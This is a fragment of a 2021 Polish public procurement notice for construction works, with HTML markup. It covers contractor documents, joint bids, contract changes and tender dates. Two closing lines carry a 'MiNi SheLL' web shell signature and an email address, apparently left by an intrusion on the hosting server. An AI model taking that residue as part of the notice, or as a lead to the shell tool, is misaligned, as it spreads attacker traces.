Karnego, o której mowa w rozdz. VI pkt 5.2) lit. a – składa<br/>informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku<br/>takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub<br/>administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie,<br/>o którym mowa w rozdz. VI pkt 5.2) lit. a. Dokument powinien być wystawiony nie wcześniej niż<br/>6 miesięcy przed jego złożeniem<br/>b) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, o których mowa w w rozdz. VI pkt 5.2) lit. c – składa dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie<br/>zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie<br/>jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej<br/>procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty powinny być<br/>wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa powyżej, lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy pzp, zastępuje się je<br/>odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie<br/>wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju,<br/>w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te<br/>zdolności są wymagane.<br/>W w/w przypadkach wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy (załącznik nr 4 do SWZ).<br/>Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy. Pełnomocnictwo należy złożyć wraz z ofertą. Z pełnomocnictwa musi wynikać fakt<br/>reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Zamiast pełnomocnictwa Zamawiający dopuszcza złożenie umowy o współdziałaniu, z której<br/>wynikać będzie przedmiotowe pełnomocnictwo.<br/>Oświadczenie o którym mowa w rozdz. VI pkt 1.1) niniejszej SWZ składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>W przypadkach opisanych w rozdz. V pkt 3 SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni wykonawcy (załącznik nr 4 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się możliwość istotnych zmian postanowień zawartej umowy w zakresie: 1)<br/>Przedłużenia terminu realizacji przedmiotu umowy – maksymalnie o ilość dni odpowiadającą<br/>wstrzymaniu lub opóźnieniu w wykonywaniu robót, jedynie w następstwie:<br/>a) opóźnienia w przekazaniu przez Zamawiającego terenu budowy,<br/>b) przestojów i opóźnień powstałych z przyczyn niezależnych od Wykonawcy. Zamawiający<br/>przewiduje przedłużenie realizacji umowy o czas niezbędny do realizacji konsekwencji tych<br/>zdarzeń,<br/>c) wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających, bądź<br/>ograniczających w istotny sposób możliwość prowadzenia robót zgodnie z ustaloną technologią<br/>ich wykonania, jeżeli warunki takie utrzymują się dłużej niż 14 dni i były niemożliwe do<br/>przewidzenia,<br/>d) wystąpienia klęski żywiołowej na terenie prowadzonych robót, mającej bezpośredni wpływ na<br/>dochowanie umownego terminu zakończenia realizacji przedmiotu umowy,<br/>e) niemożności realizacji przedmiotu umowy, z powodu niedopuszczenia do wykonywania robót<br/>lub nakazu ich wstrzymania przez uprawniony organ, z przyczyn niezawinionych przez<br/>Wykonawcę,<br/>f) działań organów administracji lub gestorów sieci skutkujących przekroczeniem określonych<br/>przez prawo terminów wydawania decyzji, zezwoleń, uzgodnień lub odmową wydania przez w/w podmioty wymaganych decyzji, zezwoleń, uzgodnień itp.,<br/>g) wystąpienia wad Dokumentacji projektowej, skutkujących koniecznością dokonania w niej<br/>istotnych zmian, jeżeli uniemożliwia to lub wstrzymuje wykonywanie robót.<br/>2) Sposobu wykonania przedmiotu umowy, jedynie w następstwie:<br/>a) konieczności wykonania jakiejkolwiek części robót objętych przedmiotem umowy, przy<br/>zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w<br/>Dokumentacji projektowej, a wynikających ze stwierdzonych wad tej Dokumentacji lub zmiany<br/>stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych<br/>rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu umowy,<br/>b) stwierdzenia odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej<br/>warunków geologicznych, geotechnicznych lub hydrologicznych, które mogą skutkować<br/>niewykonaniem lub nienależytym wykonaniem przedmiotu umowy,<br/>c) stwierdzenia odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej<br/>warunków terenu budowy, w szczególności wystąpienia nie zinwentaryzowanych lub błędnie<br/>zinwentaryzowanych sieci, instalacji lub innych urządzeń i obiektów budowlanych,<br/>d) zmian technologicznych – o ile są one korzystne dla Zamawiającego i nie powodują<br/>zwiększenia wynagrodzenia Wykonawcy oraz pod warunkiem, że są spowodowane w<br/>szczególności:<br/>- zastosowania innej technologii wykonania robót spowodowanej w szczególności:<br/>niedostępnością na rynku materiałów lub urządzeń wskazanych w dokumentacji na skutek<br/>zaprzestania produkcji lub wycofania z rynku tych materiałów lub urządzeń,<br/>- pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na<br/>zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego<br/>przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót,<br/>- pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na<br/>zaoszczędzenie czasu realizacji przedmiotu umowy lub kosztów wykonywanych prac, jak<br/>również kosztów eksploatacji wykonanego przedmiotu umowy. 3) Zmiany osoby Kierownika budowy w trakcie realizacji przedmiotu umowy – zmiana taka może<br/>zostać dokonana jedynie w przypadku, gdy Wykonawca udowodni Zamawiającemu, iż<br/>proponowana na stanowisko Kierownika budowy inna osoba, posiada kwalifikacje zawodowe i<br/>doświadczenie wykazane w stopniu nie mniejszym, niż w trakcie postępowania o udzielenie<br/>zamówienia. Konieczność zmiany osoby Kierownika budowy musi być uzasadniona przez<br/>Wykonawcę na piśmie, i zaakceptowana przez Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-11 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena brutto, Okres gwarancji</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com